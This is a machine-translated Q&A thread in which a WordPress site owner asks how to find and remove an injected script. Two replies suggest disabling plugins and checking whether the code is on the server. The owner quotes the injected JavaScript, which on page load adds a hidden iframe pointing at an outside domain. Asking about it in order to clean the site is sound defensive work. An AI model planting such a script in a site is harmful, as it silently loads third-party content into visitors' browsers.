Я просмотрел свой сайт и заметил прокрутку, которой раньше не было.Найти инъекцию iframe и удалить с сайта
После осмотра я заметил, что есть невидимый iFrame.
После просмотра iframe на исходной странице я просмотрел все файлы своего сайта и не смог найти ту же строку кода, которая была в источнике.
Я запустил свой сайт, чтобы искать вредоносное ПО, но все чисто. У меня было предупреждение от Google несколько месяцев назад, но мой хост удалил вредоносные файлы, и Google одобрил очистку и все еще делает. Но теперь я вижу этот невидимый объект с URL-адресом.
Источник сценарий:
<script language="JavaScript">
if(document.loaded) {
showBrowVer();
} else {
if (window.addEventListener) {
window.addEventListener('load', showBrowVer, false);
} else {
window.attachEvent('onload', showBrowVer);
}
}
function showBrowVer() {
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://24corp-shop.com';
js_kod2.width = '250px';
js_kod2.height = '320px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
</script>
Я вижу, что в настоящее время приносимый wp_head();
, но я посмотрел через него и не видел ничего подозрительного.
Есть ли у кого-нибудь советы по поиску этой инъекции, чтобы вручную удалить ее с моего сайта WP?
Отключите все свои плагины и посмотрите, добавляет ли он один из них. Если он затем активирует каждый плагин по одному, пока он не появится снова. – Howli
Вы видите этот код в своем браузере или он содержится в исходном коде на вашем веб-сервере? – martinstoeckli
Пила его в браузере. Я отключил все плагины один за другим, и он все еще там. –